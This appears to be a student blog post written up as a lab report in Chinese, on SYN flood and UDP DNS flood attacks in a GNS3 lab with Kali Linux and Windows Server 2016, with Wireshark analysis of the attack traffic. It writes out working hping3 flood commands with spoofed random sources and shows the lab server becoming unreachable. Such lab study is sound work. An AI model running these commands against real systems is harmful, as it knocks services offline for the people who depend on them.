花开|

chchee

园龄:1年3个月粉丝:1关注:1

TCP_UDP

TCP, UDP Flood 攻击


原理

image-20241114201013859

image-20241114201038779

image-20241114201204135



TCP Flood攻击


配置环境


Windows Server 2016配置

image-20241109104636217

服务器管理器,创建一个Web服务器并开启该服务器功能

image-20241109145742883


kali配置

vim /etc/network/interfaces

image-20241109144821832

ifup eth0 开启网络

查看Kali ip 信息:

image-20241109105102854

修改路由器信息:

拓扑关系如下所示:

image-20241109145521425

GNS 3 中修改路由器 R1:

image-20241109132136568 image-20241109132412787

image-20241109132451903


GNS3 中修改Wireshark路径

image-20241109133027360



连通性测试:

Windows Server 2016 ping kali:

image-20241109144147854

kali ping Windows Server 2016:

image-20241109144301958



攻击


此时kali可以正常访问服务器:

image-20241109150552373


在Kali Linux上使用 hping3 攻击Windows 2016 Server

hping3 -S(表示SYN Flood攻击) -c 包数量 –-flood(表示以最快速度发送包,并且不显示回复) -d 每个包中数据长度 -w 窗口长度 -p 目标端口号 --rand-source(表示以随机的IP地址发送流量)


在GNS3上服务器网段上打开Wireshark抓包


hping3 -S -c 100 --flood -d 32 -w 64 -p 80 --rand-source 192.168.2.2

image-20241109162645887

此时服务器可以正常访问


hping3 -S -c 500 --flood -d 64 -w 128 -p 80 --rand-source 192.168.2.2

image-20241109162713438

此时服务器也可以正常访问,但加载时间较长


hping3 -S -c 1000 --flood -d 128 -w 512 -p 80 --rand-source 192.168.2.2

image-20241109162826542

此时服务器无法访问,页面无法加载

image-20241109151812208



UDP 攻击


创建 DNS 服务器域名到 IP 地址的映射


创建了DNS服务器上www.cybersecurity.com到其IP地址的映射关系:

  1. 新建区域:

image-20241109164042178

区域名为 www.cybersecurity.com

image-20241109164121888

新建主机:

image-20241109164222348

填写ip地址作为该域名的解析地址:

image-20241109164301606



win 10 访问域名


win10 网络配置如下:

image-20241109165201330


Win10 正常解析出 www.cybersecurity.com的IP地址:

image-20241109165351812


Wireshark抓取该过程的UDP报文:

image-20241109171320690


Win10请求Windows Server2016 DNS 解析的UDP报文分析:

image-20241109171126143

UDP 字段包括:源端口号,目的端口号,报文长度,校验和,时间戳,载荷。

数据段包括请求的选项、查询部分(Queries) ,查询部分包括域名(www.cybersecurity.com),域名长度(Name Length : 21 ),查询类型 (Type: AAAA)


Windows Server 2016的响应报文如下:

image-20241109171159120

响应报文中数据段额外包含 Answers 字段:包括对客户端查询的回答(addr 192.168.2.3)、请求到达时间、响应时间



攻击

通过Kali Linux的hping3工具用以下指令攻击Windows2016服务器

hping3 --udp --rand-source -p 53 -d 100 --flood 192.168.2.2

  • --rand-source : 表示使用随机源ip地址


打开真实机上的Wireshark抓取192.168.2.0/24网段的流量,观察并分析攻击时发送的UDP包的特征: UDP 包的源 IP 地址随机,且UDP 包的格式非法(Malformed Packet)

image-20241109172218589


攻击UDP 包的具体内容如下:

image-20241109173057790

攻击UDP包的特征:

  1. 基于UDP协议,目标端口是 53(DNS 端口)
  2. 源 IP 地址是随机变化的 (--rand - source参数)
  3. “Malformed Packet: DNS”(畸形 DNS 数据包)。因为hping3发送的数据包可能不符合正常的 DNS 数据包格式,目的是通过发送异常数据包来干扰或攻击目标服务器的 DNS 服务。这种畸形数据包可能会导致目标服务器在处理 DNS 请求时出现错误,消耗系统资源来处理这些异常情况。

此时在Windows10上通过nslookup 无法解析出域名

image-20241109172142326

本文作者:chchee

本文链接:https://www.cnblogs.com/chchee-blog/p/18546721

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   chchee  阅读(16)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起